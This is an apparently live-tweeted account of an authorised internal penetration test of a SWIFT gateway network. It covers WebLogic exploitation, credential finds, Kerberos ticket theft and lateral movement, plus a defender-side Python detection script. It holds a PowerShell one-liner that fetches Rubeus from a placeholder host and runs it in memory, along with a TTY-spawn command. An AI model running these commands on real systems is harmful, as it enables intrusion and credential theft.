Good morning my fellow #infosec and other curious individuals! Today is day TWO of my <semi> live tweeted Internal Penetration Test with Acme. Updates to follow. Here's the thread from yesterday:
First things first, gotta get the house situated so that I can be undistracted. Let's grab some breakfast, reestablish my tunnels and start taking a look at overnight scanning data.
Oh, and if anyone is interested, this is my base playlist:
music.youtube.com/playlist?list=…
BUT I click "Start Radio" so that it gets stuff like the playlist. :)
Looks like one of the Nessus scanners picked up a bunch of WebLogic/Tomcat issues overnight. This is common with SWIFT. Let's take a look and maybe get a shell?
That AsyncResponse Vuln in WebLogic never disappoints! Linux shell obtained!
Need a ghetto TTY?
python -c 'import pty; pty.spawn("/bin/bash")'
Need to do some privilege escalation. For the sake of time, we'll use LinEnum. (I'm aware there are a bazillion other options)
github.com/rebootuser/Lin…
I'm pretty sure it's an easy upgrade and this device is on the domain, so there's at least more I can do with it like 1/x
if it will allow me to log in with the domain user I have, I may be able to escalate through that via some arbitrary policy that I've not discovered yet.
While enumerating stuff myself as the script is running, I found some passwords in ~/.bash_history! They don't work on any account on this device directly, but maybe in the domain?
That's a nope. Let's keep going.
Ok. Device wasn't connected to the domain, and there's no immediate way to root. Probably a ton of files that have juicy info in them, but we'll come back to it. There is another WebLogic server with this vulnerability. Let's hit that.
Ohh! This one is Windows, should be an instant SYSTEM shell if I can get it stable.
Was not a SYSTEM shell. But it did get me another user. Looks like this user has the ability to escalate to high-integrity:
Meterpreter is being killed immediately, so currently I'm just stuck with a shell. @zerosum0x0 created an awesome tool called Koadic, and I forked it when they took their leave of absence. I didn't really modify it.
github.com/offsecginger/k…
This should be enough to dump lsass
Ok. So even Koadic is getting eaten. No worries. We can do this with something else. I'll hold off on using Cobalt Strike for now.
Ok had to step away for a second to marvel at the realization of what device I'm actually on. I can see every single SWIFT message before it's sent to the autoclient. Hell, I think I can manipulate them too. Screw it. I'm standing up Cobalt Strike.
Lunch break! Be back shortly!
Ok. Back. That was annoying, and Cobalt Strike isn't needed. I just decided to exhaust different avenues of getting a solid shell. I was unsuccessful. BUT! Here's what I DO have now:
- Weak CMDShell
- A local Admin user I created (unneeded now)
- Valid TGTs for domain users! 1/x
I was successful in using the Weak CMDShell I got from exploiting WebLogic to execute Rubeus in memory. Check this out:
2/x
powershell.exe -c "$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest 'http://x.x.x.x/rubeus' -UseBasicParsing | Select-Object -ExpandProperty Content));[Rubeus.Program]::Main('triage')"
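From the defender's side, the one-liner above leaves a distinctive process-creation trail: PowerShell spawned under the application server's Java process, with a command line that feeds an HTTP download straight into a reflective Assembly.Load and calls a Rubeus entry point. The check below is an added example, not code from the thread or its author; the record format, field names, sample records and the 198.51.100.7 address are all constructed for this illustration.

```python
import re

# Constructed process-creation records in a flattened key=value style (not logs from the
# engagement). The fields mirror what Sysmon event 1 / Windows 4688 with command-line
# auditing would give you, but the layout is this example's own.
SAMPLE_EVENTS = [
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe ParentImage=C:\\Oracle\\Middleware\\jdk\\bin\\java.exe CommandLine=powershell.exe -c \"$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest 'http://198.51.100.7/rubeus' -UseBasicParsing | Select-Object -ExpandProperty Content));[Rubeus.Program]::Main('triage')\"",
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe ParentImage=C:\\Windows\\explorer.exe CommandLine=powershell.exe -c \"Get-Service | Where-Object Status -eq Running\"",
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe ParentImage=C:\\Windows\\explorer.exe CommandLine=powershell.exe -c \"Invoke-WebRequest 'https://example.org/tool.zip' -OutFile C:\\Temp\\tool.zip\"",
]

EVENT_RE = re.compile(r"^Image=(?P<image>.*?) ParentImage=(?P<parent>.*?) CommandLine=(?P<cmd>.*)$")

# Reflective .NET load from a byte array rather than from a file on disk.
REFLECTIVE_LOAD = re.compile(r"\[(?:System\.)?Reflection\.Assembly\]::Load\s*\(", re.I)
# Common ways to pull content over HTTP inside the same command line.
WEB_FETCH = re.compile(r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|Net\.WebClient|Download(?:Data|String)", re.I)
# The Rubeus entry point seen in the thread's command.
RUBEUS_ENTRY = re.compile(r"\[Rubeus\.Program\]::Main", re.I)
# Heuristic: a shell spawned by a Java process is how a WebLogic-style exploit shows up.
APP_SERVER_PARENT = re.compile(r"\\javaw?\.exe$", re.I)

def analyze_event(line):
    """Return severity and matched reasons for one record, or None if it does not parse."""
    m = EVENT_RE.match(line)
    if not m:
        return None
    cmd, parent = m.group("cmd"), m.group("parent")
    reasons = []
    if REFLECTIVE_LOAD.search(cmd):
        reasons.append("reflective_assembly_load")
    if WEB_FETCH.search(cmd):
        reasons.append("web_fetch")
    if RUBEUS_ENTRY.search(cmd):
        reasons.append("rubeus_entrypoint")
    if APP_SERVER_PARENT.search(parent):
        reasons.append("spawned_by_java_app_server")
    # A download by itself is routine; a download feeding a reflective load is not.
    if "rubeus_entrypoint" in reasons or {"reflective_assembly_load", "web_fetch"} <= set(reasons):
        severity = "high"
    elif "reflective_assembly_load" in reasons or "spawned_by_java_app_server" in reasons:
        severity = "medium"
    else:
        severity = "none"
    return {"severity": severity, "reasons": reasons, "cmd": cmd}

def analyze_events(lines):
    """Keep only records that scored above 'none'."""
    return [r for r in (analyze_event(l) for l in lines) if r and r["severity"] != "none"]

if __name__ == "__main__":
    for hit in analyze_events(SAMPLE_EVENTS):
        print(hit["severity"], hit["reasons"])
```

The third sample shows why the download cmdlet alone is not scored: saving a file to disk with -OutFile is routine admin activity, while the in-memory load is what let the tool run where Meterpreter and Koadic were being killed.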
More DNS trouble. Back on track now! I think my next step will be to escalate in the domain. Playing with these half-privileges is causing more trouble than it's worth.
I stole one of the TGTs from this SWIFT device and used it against the only device that the user was Local Admin on. SMBExec'd and now I have a SYSTEM shell on a device!
Ok that's going to be all for the day! I was able to dump some hashes with CrackMapExec (which gave me a cleartext password), sprayed that and it gave me 3 more accounts, which gave me one more device to dump LSA. Pulling threads, I tell ya!
Speaking of:
Earlier thread from @offsec_ginger (May 3):
I'm going to <semi> live tweet this Internal Penetration Test. Calling the company Acme
Important notes:
Assumed Breach (Already have a Debian based image, no creds, but solely for the sake of having tools locally)
Landing in the SWIFT gateway network
Flags: DA/SWIFT 1/x
Non-Evasive (we can sound alarms, they're only monitoring and validating our actions, this is not a purple team assessment to fill gaps in their NIPS)
Crystal/Glass/Full-Disclosure whatever your org calls "we'll give you any info you need to progress in terms of network topology"
Starting off with good old Nessus/Nmap one-two punch against the in-scope ranges provided to us during our kick off. #nessus #nmap